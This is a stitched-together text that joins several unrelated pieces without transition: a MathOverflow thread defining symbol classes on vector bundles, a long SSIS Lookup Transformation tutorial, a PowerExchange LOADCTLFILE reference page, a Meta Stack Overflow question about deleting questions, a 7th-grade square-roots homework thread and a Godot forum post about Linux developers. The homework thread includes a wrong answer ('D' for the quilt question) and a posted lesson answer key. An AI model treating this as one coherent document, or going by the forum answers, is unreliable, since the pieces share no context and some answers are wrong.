Note that classical symbols (symbols with an asymptotic expansion at infinity) can be interpreted as smooth functions on the (radial) compactification, and thus for them there is a nice coordinate-free interpretation (I think this approach is popularized by Richard Melrose). Something along these lines would be perfect, but a definition based on additional data (like choosing a fiber metric and/or connection) is also OK.
$\begingroup$ This is discussed in many places. See e.g. mathoverflow.net/questions/3477/… A possible global definition of a symbol uses jet bundles. Basically, a linear differential operator of order $k$ is a linear bundle map from the $k$-th jet prolongation of $J^kE$ into the target bundle. The symbol is then the associated map from $J^kE / J^{k-1}E \simeq \bigodot^k TM \times E$ to the target bundle. $\endgroup$ – Vít Tuček Aug 27 '14 at 20:11
$\begingroup$ Thanks Vít Tuček for your comment. Maybe I should have made this clear in the question: I'm not interested in the symbol of a differential operator but of a pseudo-differential operator. These symbols are more generally defined via the above symbol estimates. Furthermore, pseudo-differential operators does not have such a nice interpretation in terms of jet bundles, see for example mathoverflow.net/questions/75976/symbol-of-pseudodiff-operator $\endgroup$ – Tobias Diez Aug 28 '14 at 20:24
• $\begingroup$ I see. In that case I am very interested in answers. :) You can edit your questions and in this case I would even consider adding "pseudodifferential" to the title. $\endgroup$ – Vít Tuček Aug 28 '14 at 20:57
I think the following should work:
Let $M$ be a compact manifold (just to be safe) and $\pi :E \to M$ a vector bundle. Since $E$ carries an action of $\mathbb{R}^{\times}$, there's an invariant notion of a function on $\overset{\circ}{E}$ ($E$ without the zero section) which is homogeneous of degree $s$ for every $s \in \mathbb{R}$, namely:
$$\{ f: \overset{\circ}{E} \to \mathbb{R} | f(\lambda v) = |\lambda|^s f(v) \}$$
Using this we can define what it means for a function to have growth of degree $\le s$. Namely you just take those functions $f$ on $E$ s.t. $f = O(\psi)$ for some homogeneous function $\psi$ of degree $s$ (where the $O$ notation is supposed to be interpreted fiberwise and not in the $M$-direction).
All that's left now is to take care of derivatives, but the vertical subbundle $VE \subset TE$ is always globally well defined (it is the kernel of the differential $d\pi : TE \to TM$). Moreover we can also consider vertical vector fields which are invariant w.r.t. the action of $E$ on itself by vector addition. That is
$$C^{\infty}(E,VE)^E = \{X \in C^{\infty}(E,VE) | \forall u \in C^{\infty}(M,E), t_{\pi^*u}^* X = X\}$$
where $t_{\pi^*u}^*$ is the pullback along the translation by $\pi^*u$. Call these vertical vector fields linear. In local coordinates these are the vector fields which are constant along the fibers.
Now we can say that a function $f$ on $E$ is of symbol class $\le m$ iff for every collection of $r$ linear vector fields the growth of the iterated derivative w.r.t. these vector fields is of degree $\le m-r$. This definition is obviously local on $M$, and it also recovers your definition in the case of the trivial vector bundle, so it must coincide with it in the global case; I hope I'm not wrong...
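Restating the final definition above as a single display (the symbol-class notation $S^m(E)$ is my shorthand, not part of the answer):

\begin{equation}
f \in S^{m}(E) \iff \forall r \ge 0, \ \forall X_1, \dots, X_r \in C^{\infty}(E, VE)^E : \quad X_1 \cdots X_r f = O(\psi_{m-r}) \ \text{fiberwise},
\end{equation}

for some $\psi_{m-r}$ homogeneous of degree $m-r$ (which may depend on the chosen fields $X_i$).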
Lookup Transformation in SSIS
The Lookup Transformation
The Lookup Transformation in SSIS enables you to perform operations similar to relational inner and outer hash joins. The main difference is that the operations occur outside the realm of the database engine, in the SSIS Data Flow. Typically, you would use this component within the context of an integration process, such as the ETL layer that populates a data warehouse from source systems. For example, you may want to populate a table in a destination system by joining data from two separate source systems on different database platforms.
The component can join only two data sets at a time, so in order to join three or more data sets, you would need to chain multiple Lookup Transformations together, using output from one Lookup Transformation as an input for another. Compare this to relational join semantics, whereby in a similar fashion you join two tables at a time and compose multiple such operations to join three or more tables.
The transformation is written to behave in a synchronous manner, meaning it does not block the pipeline while it is doing its work. While new rows are entering the Lookup Transformation, rows that have already been processed are leaving through one of four outputs. However, there is a catch here: in certain caching modes (discussed later in this article) the component will initially block the package’s execution for a period of time while it loads its internal caches with the Lookup data.
The component provides several modes of operation that enable you to compare performance and resource usage. In full-cache mode, one of the tables you are joining is loaded in its entirety into memory, and the rows from the other table are then streamed through the pipeline one buffer at a time while the selected join operation is performed. With no up-front caching, each incoming row in the pipeline is compared one at a time to a specified relational table. Between these two options is a third that combines their behavior. Each of these modes is explored later in this article (see the “Full-Cache Mode,” “No-Cache Mode,” and “Partial-Cache Mode” sections).
Of course, some rows will join successfully, and some rows will not be joined. For example, consider a customer who has made no purchases. His or her identifier in the Customer table would have no matches in the sales table. SSIS supports this scenario by having multiple outputs on the Lookup Transformation. In the simplest (default/legacy) configuration, you would have one output for matched rows and a separate output for nonmatched and error rows. This functionality enables you to build robust (error-tolerant) processes that, for instance, might direct nonmatched rows to a staging area for further review. Or the errors can be ignored, and a Derived Column Transformation can be used to check for null values. A conditional statement can then be used to add default data in the Derived Column. A more detailed example is given later in this article.
The Cache Connection Manager (CCM) is a separate component that is essential when creating advanced Lookup operations. The CCM enables you to populate the Lookup cache from an arbitrary source; for instance, you can load the cache from a relational query, an Excel file, a text file, or a Web service. You can also use the CCM to persist the Lookup cache across iterations of a looping operation. You can still use the Lookup Transformation without explicitly using the CCM, but you would then lose the resource and performance gains in doing so. The CCM is described in more detail later in this article.
Using the Lookup Transformation
The Lookup Transformation solves joins differently than the Merge Join Transformation. It typically caches one of the data sets in memory and then compares each row arriving from the other data set in its input pipeline against the cache. The caching mechanism is highly configurable, providing a variety of options to balance the performance and resource utilization of the process.
Full-Cache Mode
In full-cache mode, the Lookup Transformation stores all the rows resulting from a specified query in memory. The benefit of this mode is that Lookups against the in-memory cache are very fast — often an order of magnitude or more, relative to a no-cache Lookup. Full-cache mode is the default because in most scenarios it has the best performance of all the techniques discussed in this article.
Continuing with the example package you built in the previous section (“Using the Merge Join Transformation”), you will in this section extend the existing package in order to join the other required tables. You already have the related values from the order header and order detail tables, but you still need to map the natural keys from the Product and Customer tables. You could use Merge Join Transformations again, but this example demonstrates how the Lookup Transformation can be of use here:
1. Open the package you created in the previous step. Remove the Union All Transformation. Drop a Lookup Transformation on the surface, name it LKP Customer, and connect the output of the Merge Join Transformation to it. Open the editor of the Lookup Transformation.
2. Select Full-Cache Mode, specifying an OLE DB Connection Manager. There is also an option to specify a Cache Connection Manager (CCM), but you won’t use this just yet — later in this Joining Data Topic you will learn how to use the CCM. (After you have learned about the CCM, you can return to this
exercise and try to use it here instead of the OLE DB Connection Manager.)
3. Click the Connection tab and select the AdventureWorks connection, and then use the following SQL query:

   select CustomerID, AccountNumber
   from Sales.Customer;
4. Preview the results to ensure that everything is set up OK, then click the Columns tab. Drag the CustomerID column from the left-hand table over to the CustomerID column on the right; this creates a linkage between these two columns, which tells the component that this column is used to
perform the join. Click the checkbox next to the AccountNumber column on the right, which tells the component that you want to retrieve the AccountNumber values from the Customer table for each row it compares. Note that it is not necessary to retrieve the CustomerID values from the
right-hand side because you already have them from the input columns. The editor should now look like shown screenshot below.
CustomerID values
5. Click OK on the dialog, hook up a “trash” Union All Transformation. Create a Data Viewer on the match output path of the Lookup Transformation and execute the package (you could also attach a Data Viewer on the no-match output and error output if needed). You should see results similar to the screenshot below. Notice you have all the columns from the order and details data, as well as the selected column from the Customer table.
Customer table
Because the Customer table is so small and the package runs so fast, you may not have noticed what happened here. As part of the pre-execution phase of the component, the Lookup Transformation fetched all the rows from the Customer table using the query specified (because the Lookup was configured to execute in full-cache mode). In this case, there are only 20,000 or so rows, so this happens very quickly. Imagine that there were many more rows, perhaps two million. In this case, you would likely experience a delay between executing the package and seeing any data actually travelling down the second pipeline. The screenshot below shows a decision tree that demonstrates how the Lookup Transformation in full-cache mode operates at runtime. Note that the Lookup Transformation can be configured to send found and not-found rows to the same output, but the illustration assumes they are going to different outputs. In either case, the basic algorithm is the same.
Lookup Transformation
Check the Execution Results tab on the SSIS design surface (see the screenshot below) and see how long it took for the data to be loaded into the in-memory cache. In larger data sets this number will be much larger and could even take longer than the execution of the primary functionality!
SSIS design surface
Note: If during development and testing you want to emulate a long-running query, use the T-SQL waitfor statement in the query in the following manner:

   waitfor delay '00:00:05'; -- Wait 5 seconds before returning any rows
   select CustomerID, AccountNumber
   from Sales.Customer;
After fetching all the rows from the specified source, the Lookup Transformation caches them in memory in a special hash structure. The package then continues execution; as each input row enters the Lookup Transformation, the specified key values are compared to the in-memory hash values, and, if a match is found, the specified return values are added to the output stream.
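The runtime behavior just described (build the hash once up front, then probe it per incoming row) can be modeled in a few lines of Python. This is a conceptual sketch of full-cache mode, not SSIS internals, and the function and parameter names are illustrative:

```python
def full_cache_lookup(reference_rows, input_rows, key, returned):
    """Conceptual model of the SSIS Lookup in full-cache mode.

    reference_rows: iterable of dicts (the reference query result)
    input_rows:     iterable of dicts (the pipeline)
    key:            column name used to join
    returned:       column name to copy from the reference side
    Yields (row, status) where status is 'match' or 'no match'.
    """
    # Pre-execution phase: load the entire reference set into a hash.
    cache = {ref[key]: ref[returned] for ref in reference_rows}

    # Execution phase: one cheap in-memory probe per incoming row.
    for row in input_rows:
        if row[key] in cache:
            yield {**row, returned: cache[row[key]]}, "match"
        else:
            yield row, "no match"

customers = [{"CustomerID": 1, "AccountNumber": "AW00000001"}]
orders = [{"CustomerID": 1}, {"CustomerID": 2}]
results = list(full_cache_lookup(customers, orders, "CustomerID", "AccountNumber"))
```

The up-front dictionary build is the analogue of the blocking pre-execution load; every probe afterwards avoids a database round trip.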
No-Cache Mode
If the reference table (the Customer table in this case) is too large to cache all at once in the system’s memory, you can choose to cache nothing or you can choose to cache only some of the data. This section explores the first option: no-cache mode.
In no-cache mode, the Lookup Transformation is configured almost exactly the same as in full-cache mode, but at execution time the reference table is not loaded into the hash structure. Instead, as each input row flows through the Lookup Transformation, the component sends a request to the reference table in the database server to ask for a match. As you would expect, this can impose a high performance overhead on the system, so use this mode with care.
Depending on the size of the reference data, this mode is usually the slowest, though it scales to the largest number of reference rows. It is also useful for systems in which the reference data is highly volatile, such that any form of caching would render the results stale and erroneous.
The screenshot below illustrates the decision tree that the component uses during runtime. As before, the diagram assumes that separate outputs are configured for found and not-found rows, though the algorithm would be the same if all rows were sent to a single output.
no-cache mode
Here are the steps to build a package that uses no-cache mode:
1. Rather than build a brand-new package to try out no-cache mode, use the package you built in the previous section (“Full-Cache Mode”). Open the editor for the Lookup Transformation and on the first tab (General), choose the No-Cache option. This mode also enables you to customize (optimize) the query that SSIS will submit to the relational engine. To do this, click the Advanced tab and check the Modify the SQL Statement checkbox. In this case, the auto-generated statement is close enough to optimal, so you don’t need to touch it. (If you have any problems reconfiguring the Lookup Transformation, then delete the component, drop a new Lookup on the design surface, and reconnect and configure it from scratch.)
2. Execute the package. It should take slightly longer to execute than before, but the results should be the same.
The trade-off you make between the caching modes is one of performance versus resource utilization. Full-cache mode can potentially use a lot of memory to hold the reference rows in memory, but it is usually the fastest because Lookup operations do not require a trip to the database. No-cache mode, on the other hand, requires next to no memory, but it’s slower because it requires a database call for every Lookup. This is not a bad thing; if your reference table is volatile (i.e., the data changes often), you may want to use no-cache mode to ensure that you always have the latest version of each row.
Partial-Cache Mode
Partial-cache mode gives you a middle ground between the no-cache and full-cache options. In this mode, the component caches only the most recently used data within the memory boundaries specified under the Advanced tab in the Lookup Transform. As soon as the cache grows too big, the least-used cache data is thrown away.
When the package starts, much like in no-cache mode, no data is preloaded into the Lookup cache. As each input row enters the component, it uses the specified key(s) to attempt to find a matching record in the reference table using the specified query. If a match is found, then both the key and the Lookup values are added to the local cache on a just-in-time basis. If that same key enters the Lookup Transformation again, it can retrieve the matching value from the local cache instead of the reference table, thereby saving the expense and time incurred of querying the database.
In the example scenario, for instance, suppose the input stream contains a CustomerID of 123. The first time the component sees this value, it goes to the database and tries to find it using the specified query. If it finds the value, it retrieves the AccountNumber and then adds the CustomerID/AccountNumber combination to its local cache. If CustomerID 123 comes through again later, the component will retrieve the AccountNumber directly from the local cache instead of going to the database.
If, however, the key is not found in the local cache, the component will check the database to see if it exists there. Note that the key may not be in the local cache for several reasons: maybe it is the first time it was seen, maybe it was previously in the local cache but was evicted because of memory pressure, or finally, it could have been seen before but was also not found in the database.
For example, if CustomerID 456 enters the component, it will check the local cache for the value. Assuming it is not found, it will then check the database. If it finds it in the database, it will add 456 to its local cache. The next time CustomerID 456 enters the component, it can retrieve the value directly from its local cache without going to the database. However, it could also be the case that memory pressure caused this key/value to be dropped from the local cache, in which case the component will incur another database call.
If CustomerID 789 is not found in the local cache, and it is not subsequently found in the reference table, the component will treat the row as a nonmatch, and will send it down the output you have chosen for nonmatched rows (typically the no-match or error output). Every time that CustomerID 789 enters the component, it will go through these same set of operations. If you have a high degree of expected misses in your Lookup scenario, this latter behavior — though proper and expected — can be a cause of long execution times because database calls are expensive relative to a local cache check.
To avoid these repeated database calls while still getting the benefit of partial-cache mode, you can use another feature of the Lookup Transformation: the miss cache. Using the partial-cache and miss-cache options together, you can realize further performance gains. You can specify that the component remembers values that it did not previously find in the reference table, thereby avoiding the expense of looking for them again. This feature goes a long way toward solving the performance issues discussed in the previous paragraph, because ideally every key is looked for once — and only once — in the reference table.
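The combination of a recently-used cache, eviction under memory pressure, and a miss cache can be modeled with a small Python class. This is a conceptual sketch only; the names (max_size, db_lookup) are illustrative and do not correspond to actual SSIS settings:

```python
from collections import OrderedDict

class PartialCacheLookup:
    """Conceptual model of partial-cache mode with a miss cache.

    `db_lookup` stands in for the per-row database query; the class
    counts calls to it so the caching effect is observable.
    """

    def __init__(self, db_lookup, max_size=2):
        self.db_lookup = db_lookup
        self.max_size = max_size
        self.hits = OrderedDict()   # recently used key -> value
        self.misses = set()         # keys known to be absent
        self.db_calls = 0

    def lookup(self, key):
        if key in self.misses:          # known non-match: skip the DB
            return None
        if key in self.hits:            # local cache hit
            self.hits.move_to_end(key)
            return self.hits[key]
        self.db_calls += 1              # fall through to the database
        value = self.db_lookup(key)
        if value is None:
            self.misses.add(key)        # remember the miss, too
        else:
            self.hits[key] = value
            if len(self.hits) > self.max_size:
                self.hits.popitem(last=False)  # evict least recently used
        return value

accounts = {123: "AW123", 456: "AW456"}
lkp = PartialCacheLookup(accounts.get)
for cid in [123, 123, 789, 789, 456]:
    lkp.lookup(cid)
print(lkp.db_calls)  # 3: one call each for 123, 789, and 456
```

Without the miss cache, the second lookup of CustomerID 789 would have cost a fourth database call.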
To configure this mode, follow these steps (refer to the screenshot below):
partial-cache
1. Open the Lookup editor, and in the General tab select the Partial Cache option. In the Advanced tab, specify the upper memory boundaries for the cache and edit the SQL statement as necessary. Note that both 32-bit and 64-bit boundaries are available because the package may be built and
tested on a 32-bit platform but deployed to a 64-bit platform, which has more memory. Providing both options makes it simple to configure the component’s behavior on both platforms.
2. If you want to use the miss-cache feature, configure what percentage of the total cache memory you want to use for this secondary cache (say, 25%).
The decision tree shown in Figure 7-22 demonstrates how the Lookup Transformation operates at runtime when using the partial-cache and miss-cache options. Note that some of the steps are conceptual; in reality, they are implemented using a more optimal design. As per the decision trees shown for the other modes, this illustration assumes separate outputs are used for the found and not-found rows.
decision trees
Multiple Outputs
At this point, your Lookup Transformation is working, and you have learned different ways to optimize its performance using fewer or more resources. In this section, you’ll learn how to utilize some of the other features in the component, such as the different outputs that are available.
Using the same package you built in the previous sections, follow these steps:
1. Reset the Lookup Transformation so that it works in full-cache mode. It so happens that, in this example, the data is clean and thus every row finds a match, but you can emulate rows not being found by playing quick and dirty with the Lookup query string. This is a useful trick to use at
design time in order to test the robustness and behavior of your Lookup Transformations. Change the query statement in the Lookup Transformation as follows:

   select CustomerID, AccountNumber
   from Sales.Customer
   where CustomerID % 7 <> 0; -- Remove 1/7 of the rows
2. Run the package again. This time, it should fail to execute fully because the cache contains one-seventh fewer rows than before, so some of the incoming keys will not find a match, as shown in the screenshot below. Because the default error behavior of the component is to fail on any nonmatch or error condition such as truncation, the Lookup halts as expected.
behavior of the component
Try some of the other output options. Open the Lookup editor and on the dropdown list box in the General tab, choose how you want the Lookup Transformation to behave when it does not manage to find a matching join entry:
->Fail Component should already be selected. This is the default behavior, which causes the component to raise an exception and halt execution if a nonmatching row is found or a row causes an error such as data truncation.
->Ignore Failure sends any nonmatched rows and rows that cause errors down the same output as the matched rows, but the Lookup values (in this case AccountNumber) will be set to null. If you add a Data Viewer to the flow, you should be able to see this; several of the account numbers will have null values.
->Redirect Rows to Error Output is provided for backward compatibility with SQL Server 2005. It causes the component to send both nonmatched and error-causing rows down the same error (red) output.
->Redirect Rows to No Match Output causes errors to flow down the error (red) output, and no-match rows to flow down the no-match output.
3. Choose Ignore Failure and execute the package. The results should look like the screenshot below. You can see that the number of incoming rows on the Lookup Transformation matches the number of rows coming out of its match output, even though one-seventh of the rows were not actually matched. This is because the rows failed to find a match, but because you configured the Ignore Failure option, the component did not stop the execution.
packaged output
4. Open the Lookup Transformation and this time select “Redirect rows to error output.” In order to make this option work, you need a second trash destination on the error output of the Lookup Transformation, as shown in the screenshot below. When you execute the package using this mode, the found rows will be sent down the match output, and unlike the previous modes, not-found rows will not be ignored or cause the component to fail but will instead be sent down the error output.
Redirect rows to error output
5. Finally, test the “Redirect rows to no match output” mode. You will need a total of three trash destinations for this to work, as shown in the screenshot below.
Redirect rows to no match output
In all cases, add Data Viewers to each output, execute the package, and examine the results. The outputs should not contain any errors such as truncations, though there should be many nonmatched rows. So how exactly are these outputs useful? What can you do with them to make your packages more robust? In most cases, the errors or nonmatched rows can be piped off to a different area of the package where the values can be logged or fixed as per the business requirements. For example, one common solution is for all missing rows to be tagged with an Unknown member value. In this scenario, all nonmatched rows might have their AccountNumber set to 0000. These fixed values are then joined back into the main Data Flow and from there treated the same as the rows that did find a match. Use the following steps to configure the package to do this:
1. Open the Lookup editor. On the General tab, choose the "Redirect rows to no match output" option. Click the Error Output tab (see the screenshot below) and configure the AccountNumber column to have the value Fail Component under the Truncation column. This combination of settings means that you want a no-match output, but you don't want an error output; instead, you want the component to fail on any errors. In a real-world scenario, you may want to have an error output that you can use to log values to an error table, but this example keeps it simple.
Redirect rows to no match output
2. At this point, you could drop a Derived Column Transformation on the design surface and connect the no-match output to it. Then you would add the AccountNumber column in the derived column, and use a Union All to bring the data back together. This approach works, but the partially blocking Union All slows down performance.
However, there is a better way to design the Data Flow. Set the Lookup to Ignore Failure. Drop a Derived Column on the Data Flow. Connect the match output to the derived column. Open the Derived Column editor and replace the AccountNumber column with the following expression:
ISNULL(AccountNumber) ? (DT_STR,10,1252)"0000" : AccountNumber
The Derived Column Transformation dialog editor should now look something like the screenshot below.
Column Transformation dialog editor
Close the Derived Column editor, and drop a Union All Transformation on the surface. Connect the default output from the Derived Column to the Union All Transformation and then execute the package, as usual utilizing a Data Viewer on the final output. The package and results should look something like the screenshot below.
Derived Column editor
The output should show AccountNumbers for most of the values, with 0000 shown for those keys that are not present in the reference query (in this case because you artificially removed them).
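The pattern just walked through (look up, tag no-match rows with 0000, and union the streams back together) can be sketched outside SSIS in a few lines. The following Python analogue is illustrative only; the reference data and customer keys are hypothetical, and 0000 is the Unknown-member sentinel from the example:

```python
# Hypothetical reference data standing in for the Lookup's reference query.
reference = {"cust1": "1001", "cust2": "1002"}

def lookup_with_default(keys, default="0000"):
    """Mimic a Lookup whose no-match rows are tagged with an Unknown
    member value and then unioned back together with the matched rows."""
    matched, fixed = [], []
    for key in keys:
        if key in reference:
            matched.append((key, reference[key]))  # match output
        else:
            fixed.append((key, default))           # no-match output, fixed value
    return matched + fixed                         # Union All of both paths

print(lookup_with_default(["cust1", "cust3"]))
# [('cust1', '1001'), ('cust3', '0000')]
```

Downstream consumers then treat the fixed rows exactly like the matched ones, which is the point of the Union All step in the package.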
Expressionable Properties
If you need to build a package whose required reference table is not known at design time, this feature will be useful for you. Instead of using a static query in the Lookup Transformation, you can use an expression, which can dynamically construct the query string, or it could load the query string using the parameters feature.
The screenshot below shows an example of using an expression within a Lookup Transformation. Expressions on Data Flow Components can be accessed from the property page of the Data Flow Task itself.
Expressionable Properties
Cascaded Lookup Operations
Sometimes the requirements of a real-world Data Flow may require several Lookup Transformations to get the job done. By using multiple Lookup Transformations, you can sometimes achieve a higher degree of performance without incurring the associated memory costs and processing times of using a single Lookup.
Imagine you have a large list of products that ideally you would like to load into one Lookup. You consider using full-cache mode; however, because of the sheer number of rows, either you run out of memory when trying to load the cache or the cache-loading phase takes so long that it becomes impractical (for instance, the package takes 15 minutes to execute, but 6 minutes of that time is spent just loading the Lookup cache). Therefore, you consider no-cache mode, but the expense of all those database calls makes the solution too slow. Finally, you consider partial-cache mode, but again the expense of the initial database calls (before the internal cache is populated with enough data to be useful) is too high.
The solution to this problem is based on a critical assumption that there is a subset of reference rows (in this case product rows) that are statistically likely to be found in most, if not all, data loads. For instance, if the business is a consumer goods chain, then it’s likely that a high proportion of sales transactions are from people who buy milk. Similarly, there will be many transactions for the sales of bread, cheese, beer, and baby diapers. On the contrary, there will be a relatively low number of sales for expensive wines. Some of these trends may be seasonal — more suntan lotion sold in summer, and more heaters sold in winter. This same assumption applies to other dimensions besides products — for instance, a company specializing in direct sales may know historically which customers (or customer segments or loyalty members) have responded to specific campaigns. A bank might know which accounts (or account types) have the most activity at specific times of the month.
This statistical property does not hold true for all data sets, but if it does, you may derive great benefit from this pattern. If it doesn’t, you may still find this section useful as you consider the different ways of approaching a problem and solving it with SSIS.
So how do you use this statistical approach to build your solution? Using the consumer goods example, if it is the middle of winter and you know you are not going to be selling much suntan lotion, then why load the suntan products in the Lookup Transformation? Rather, load just the high-frequency items like milk, bread, and cheese. Because you know you will see those items often, you want to put them in a Lookup Transformation configured in full cache mode. If your Product table has, say, 1 million items, then you could load the top 20% of them (in terms of frequency/popularity) into this first Lookup. That way, you don’t spend too much time loading the cache (because it is only 200,000 rows and not 1,000,000); by the same reasoning, you don’t use as much memory.
Of course, in any statistical approach, there will always be outliers — for instance, in the previous example suntan lotion will still be sold in winter to people going on holiday to sunnier places. Therefore, if any Lookups fail on the first full-cache Lookup, you need a second Lookup to pick up the strays. The second Lookup would be configured in partial-cache mode (as detailed earlier in this Post), which means it would make database calls in the event that the item was not found in its dynamically growing internal cache. The first Lookup’s not-found output would be connected to the second Lookup’s input, and both of the Lookups would have their found outputs combined using a Union All Transformation in order to send all the matches downstream. Then a third Lookup is used in no-cache mode to look up any remaining rows not found already. This final Lookup output is combined with the others in another Union All. Below the screenshot shows what such a package might look like.
package
The benefit of this approach is that at the expense of a little more development time, you now have a system that performs efficiently for the most common Lookups and fails over to a slower mode for those items that are less common. That means that the Lookup operation will be extremely efficient for most of your data, which typically results in an overall decrease in processing time.
In other words, you have used the Pareto principle (80/20 rule) to improve the solution. The first (full-cache) Lookup stores 20% of the reference (in this case product) rows and hopefully succeeds in answering 80% of the Lookup requests. This depends largely on the user creating the right query to get the proper 20%; if the wrong data is queried, this can be the worst approach. The 20% of Lookups that fail are redirected to, and serviced by, the partial-cache Lookup, which operates against the other 80% of the data. Because you are constraining the size of the partial cache, you can ensure you don't run into any memory limitations; at the extreme, you could even use a no-cache Lookup instead of, or in addition to, the partial-cache Lookup.
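As a rough illustration of the cascade (not the SSIS implementation itself), the three tiers behave like a chain of caches in front of a slow store. All names and data in this Python sketch are invented:

```python
# Hypothetical three-tier lookup: a pre-loaded "full cache" of hot keys,
# a "partial cache" that grows on demand, and a slow fallback that stands
# in for a real per-row database call.
hot_cache = {"milk": 1, "bread": 2}   # the top-20% items, loaded up front
partial_cache = {}                    # populated as misses are resolved
backing_store = {"milk": 1, "bread": 2, "suntan lotion": 99}

def slow_db_lookup(key):
    # Stand-in for the database call a no-cache Lookup would make.
    return backing_store.get(key)

def tiered_lookup(key):
    if key in hot_cache:              # tier 1: full-cache Lookup (fast path)
        return hot_cache[key]
    if key in partial_cache:          # tier 2: partial-cache hit
        return partial_cache[key]
    value = slow_db_lookup(key)       # tier 2 miss falls through to the store
    if value is not None:
        partial_cache[key] = value    # grow the partial cache for next time
    return value
```

The common items ("milk") never leave tier 1, while an outlier like "suntan lotion" costs one slow call the first time and is cached thereafter, mirroring the full-cache/partial-cache/no-cache chain described above.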
The final piece to this puzzle is how you identify upfront which items occur the most frequently in your domain. If the business does not already keep track of this information, you can derive it by collecting statistics within your packages and saving the results to a temporary location. For instance, each time you load your sales data, you could aggregate the number of sales for each item and write the results to a new table you have created for that purpose. The next time you load the product Lookup Transformation, you join the full Product table to the statistics table and return only those rows whose aggregate count is above a certain threshold. (You could also use the data-mining functionality in SQL Server to derive this information, though the details of that are beyond the scope of the Joining Data topic.)
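The thresholding step itself is simple aggregation. A sketch in Python, under the assumption that per-item sale counts have already been collected (the sample data here is invented; in the package this would come from the statistics table populated on each load):

```python
from collections import Counter

# Invented sales history standing in for the accumulated statistics table.
sales = ["milk", "milk", "bread", "milk", "wine", "bread"]

def frequent_keys(events, threshold):
    """Keys whose aggregate count meets the threshold -- the subset
    worth pre-loading into the full-cache Lookup."""
    counts = Counter(events)
    return {key for key, n in counts.items() if n >= threshold}

print(frequent_keys(sales, 2))  # the hot items; set order may vary
```

In SQL terms this is the GROUP BY/HAVING (or TOP N) query you would join against the full Product table when loading the first Lookup's cache.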
Last updated: 28 Oct 2020
About Author
Yamuna Karumuri
Yamuna Karumuri is a content writer at Mindmajix.com. Her passion lies in writing articles on IT platforms including Machine learning, PowerShell, DevOps, Data Science, Artificial Intelligence, Selenium, MSBI, and so on. You can connect with her via LinkedIn.
Table of Contents
1. Preface
2. Introduction to PowerExchange
3. DBMOVER Configuration File
4. Netport Jobs
5. PowerExchange Message Logs and Destination Overrides
6. SMF Statistics Logging and Reporting
7. PowerExchange Security
8. Secure Sockets Layer Support
9. PowerExchange Alternative Network Security
10. PowerExchange Nonrelational SQL
11. PowerExchange Globalization
12. Using the PowerExchange ODBC Drivers
13. PowerExchange Datatypes and Conversion Matrix
14. Appendix A: DTL__CAPXTIMESTAMP Time Stamps
15. Appendix B: PowerExchange Glossary
LOADCTLFILE Statement
The LOADCTLFILE statement specifies the PDS data set that contains the control card template member for DB2 for z/OS LOAD utility batch jobs.
Operating Systems: z/OS
Data Sources: DB2 for z/OS
Required: No
LOADCTLFILE={pds_name|A}
For the pds_name variable, enter the PDS data set that contains the control card template member for DB2 for z/OS LOAD utility batch jobs. PowerExchange reads this data set on the system where you perform the bulk load. Default is A.
• When you install PowerExchange, the z/OS Installation Assistant includes your RUNLIB data set name in the LOADCTLFILE statement in the DBMOVER member.
• PowerExchange provides the following DB2 LOAD control card template members in RUNLIB:
• DB2LDCTL. Sample control card statements for nonpartitioned tables.
• DB2LDCTP. Sample control card statements for partitioned tables.
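As an illustration, a DBMOVER entry pointing the statement at a RUNLIB data set might look like the following (the data set name MYHLQ.RUNLIB is hypothetical, not a documented default):

```
LOADCTLFILE=MYHLQ.RUNLIB
```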
I have a couple of questions on SO:
1: Codeigniter - How can I sort my database result object (sorting php objects)
2: Codeigniter 2 active record — How do I create temporary table to apply second sort order?
Both I feel are interesting valid questions I would like an answer to, both pertain to the same problem - I was seeking two different approaches to solving the same problem, extensive google searches didn't find an answer.
Both have answers which do not answer the question and are stuck (one says there is no way of doing it the way I proposed, which prompted question 2; the other needs more input from me but is veering towards an approach other than that requested).
Finally, I have found a third solution which does not relate (directly) to either solution but works great for my needs.
The trouble is, I don't really have time to set up tests and examples for these old approaches to move the questions forward.
Quite often when I find a solution before anyone answers - I post it myself as an answer, but in this case it doesn't answer the question asked (although it does solve the problem behind it).
Any suggestions on what I should do here? Shall I just delete them, or shall I leave them up unattended in the hope someone knows how?
My thoughts are: delete the one I am told is not possible, and leave the other. Although this is about specific posts, are there any general guidelines for deleting questions?
2 Answers
Accepted answer (score 4)
Well, first, you may not be able to delete your questions because they have answers (unless there are no upvotes on them...).
That being said, even if they could be deleted, I would leave them up in case someone does come up with an answer in the future. Just because no one has given a satisfactory answer yet (to the question asked) does not mean that there won't be one in the future.
A good question without answers is still a good question and should remain (at least IMO).
Just a note: as long as the answers have received no upvotes, the question can technically still be deleted. – Bart Sep 24 '12 at 14:17
Ah, I have learned something new. Thanks! – Barak Sep 24 '12 at 14:17
It is not just SO you have to consider. A large number of people access the information on SO via google. Google indexes SO with what it calls "real-time search". (Indeed new questions can be accessed within seconds).
Additionally the deleted (answerless) SO questions tend to stick around for a while in the google index. So in a way you might be doing a disservice to google-users...
So if the question has no answers and almost no views over a period of more than a year, and you regret ever having asked it, I would say it is OK to delete it; otherwise, keep working on and improving it, for instance by including links to resources you have found in the meantime.
Anyways, that's my take...
7th grade math help square roots
4.
Wei-Min makes a square quilt that has an area of 100 square feet. It has 25 square blocks, each the same size. What is the length of each side of a block?
2 feet
4 feet
6 feet
10 feet
What is the value of "x" if 25^2 = x?
125
0
625
5
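Both answers can be verified with a quick calculation (shown here in Python purely as a check): each block covers 100 ÷ 25 = 4 square feet, so each side is √4 = 2 feet, and 25^2 = 625.

```python
import math

quilt_area = 100                      # square feet
num_blocks = 25
block_area = quilt_area / num_blocks  # 4.0 square feet per block
side = math.sqrt(block_area)          # 2.0 feet per side

x = 25 ** 2                           # 625
print(side, x)                        # 2.0 625
```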
• 7th grade math help square roots -
I'll be glad to check your answers.
I suggest you draw a picture of the quilt.
• 7th grade math help square roots -
D
C
• 7th grade math help square roots -
dab
• 7th grade math help square roots -
These are the correct answers for Unit 4, Lesson 1: Squares and Square Roots
1. A
2. B
3. D
4. A
5. C
Hope this helps!
• 7th grade math help square roots -
omg thank you Donut!!!
Any stats on Linux game devs?
Are there any polls on which OS platforms Godot game developers use in 2024? I am particularly interested in Linux percent but Mac also.
You can use the reports from the monthly "Steam Hardware & Software Survey" as an overall gaming platform indicator.
https://store.steampowered.com/hwsurvey/
I understand target platforms, but why is it important which platforms devs use anyway?
They haven’t done their annual poll yet this year, but there’s data from 2023:
Many dev tools are easier to develop for Linux/Mac than Windows initially only because there is pretty decent open source code/compiling/debugging documentation. Not that there is anything wrong with Windows :). I also want to know if devs use WSL on Windows and if they have any good or bad experiences.
